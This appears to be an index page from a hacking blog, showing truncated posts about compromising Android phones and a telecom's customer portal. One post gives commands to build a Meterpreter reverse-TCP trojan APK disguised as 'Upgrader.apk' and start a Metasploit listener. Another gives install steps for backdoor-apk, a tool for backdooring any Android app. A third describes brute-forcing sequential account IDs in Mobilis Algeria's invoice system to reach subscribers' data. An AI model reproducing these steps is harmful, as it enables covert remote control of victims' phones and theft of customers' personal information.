Skip to main content

Posts

Showing posts with the label Android

How to exploit android device with FatRat on kali linux

 How to exploit android device with FatRat on kali linux  in this video we will learn how can we use fatrat to exploit android lets get the trust ;)

Hack Android Using Kali (Remotely)

Hack Android Using Kali (Remotely) Hello Hackers! Welcome to arab black hat blog: This is a tutorial explaining how to hack android phones with Kali. I can't see any tutorials explaining this Hack/Exploit, so, I made one. ( Still ,you may already know about this ) Step 1: Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3: Set-Up a Listener: After it...

Hacking Android Stagefright Kali

  Hacking Android Stagefright Kali

backdoor-apk: adding a backdoor to any Android APK file

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only. Installing R3d-d3v!L@abh ~/Desktop $ git clone https://github.com/dana-at-cp/backdoor-apk.git R3d-d3v!L@abh ~/Desktop $ cd backdoor-apk/backdoor-apk/ R3d-d3v!L@abh ~/Desktop/backdoor-apk/backdoor-apk $ chmod +x *.sh R3d-d3v!L@abh ~/Desktop   /backdoor-apk/backdoor-apk $ ./backdoor-apk.sh Change log backdoor-apk v0.1.7 +**Improvements** +- Automatic generation of Metasploit resource script to handle selected payload (credit to John Troony for the suggestion) +**Bug Fixes** +- Fixed persistence hook breakage caused by upstream changes in Metasploit Usage: Video Tutorial

“Mobilis Algeria” Millions of users at risk

Hello guys, I’m back with a new post and a new discovery. As I’m a Mobilis GSM subscriber I thought about registering to their online invoice system, I took the steps and I have been provided with access to my account online . EXPLORING THE WONDERLAND : When you first login you get this page : You can do some things from here, like viewing/downloading your invoices and canceling the online account, we are mainly interested in the invoices as they contain all information about the target in order to help conduct further attacks on him/her I hooked up burp suite proxy to the browser and I logged in, I was amazed about what I was seeing …. this is happening upon login : Isn’t that a session initializer ? : /servlet/InitSessionExt?USER=”account_id”&ACCESS=1&INVOICE=”invoice_id” The “account_id” can be brute forced as it a sequence number, but how can we get the “invoice_id” f...